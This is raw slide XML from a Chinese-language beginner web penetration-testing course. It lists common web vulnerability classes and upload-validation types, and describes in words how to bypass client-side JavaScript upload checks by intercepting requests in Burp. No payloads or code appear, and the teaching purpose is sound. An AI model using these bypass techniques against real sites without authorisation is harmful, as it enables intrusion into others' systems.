      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:defRPr sz="2400" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="600"/>
        </a:spcAft>
        <a:buFont typeface="Arial" charset="0"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:lnSpc>
          <a:spcPct val="130000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="60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92.168.1.13/www.ra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sectop.com/ex1.php?di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92.168.1.23:90/pro_detail.asp?id=7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813" y="3932336"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00329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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>木桶原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059113" y="3932336"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E91A28"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570413" y="3932336"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B050"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6154738" y="3932336"/>
            <a:ext cx="1296987" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>文件包含</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722313" y="1700213"/>
            <a:ext cx="7699375" cy="1111250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>渗透测试（初级）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1546225" y="4868961"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00329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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>信息泄露</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3059113" y="4868961"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E91A28"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>越权漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570413" y="4868961"/>
            <a:ext cx="1152525" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B050"/>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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6154738" y="4868961"/>
            <a:ext cx="1296987" cy="576263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8208" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3563938" y="2899792"/>
            <a:ext cx="1403350" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>权限获取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03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="41300">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434"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上传漏洞</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539751" y="981075"/>
            <a:ext cx="3600202" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>上传验证类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、客户端验证（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、服务端检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Content-Type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、服务端黑名单验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、服务端白名单验证</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、文件加载检测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19458" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="1098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上传验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19461" name="Picture 5" descr="24114524a98cd92fe19094b11f659717a53706bd"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3851920" y="2780928"/>
            <a:ext cx="4933950" cy="2981325"/>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539750" y="981075"/>
            <a:ext cx="7561263" cy="338554"/>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基于客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证绕过案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20482" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="1412875"/>
            <a:ext cx="7489825" cy="5111750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="22288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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑"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539750" y="981075"/>
            <a:ext cx="7561263" cy="2838450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">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en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21506" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="755650" y="908050"/>
            <a:ext cx="7561263" cy="338554"/>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上面那段上传代码是基于客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证，我们可以抓包修改格式绕过上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" smtClean="0">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>传</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21507" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1043608" y="1359694"/>
            <a:ext cx="6840537" cy="4919662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="22288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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="3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2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="971600" y="1556792"/>
            <a:ext cx="6769100" cy="5040313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22530" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="468313" y="908050"/>
            <a:ext cx="7561262" cy="2989263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">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en-US" altLang="zh-CN">
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="260350"/>
            <a:ext cx="22288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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>验证绕过</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="539750" y="908050"/>
            <a:ext cx="7992690" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Brup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>抓包，发送到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Repeater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
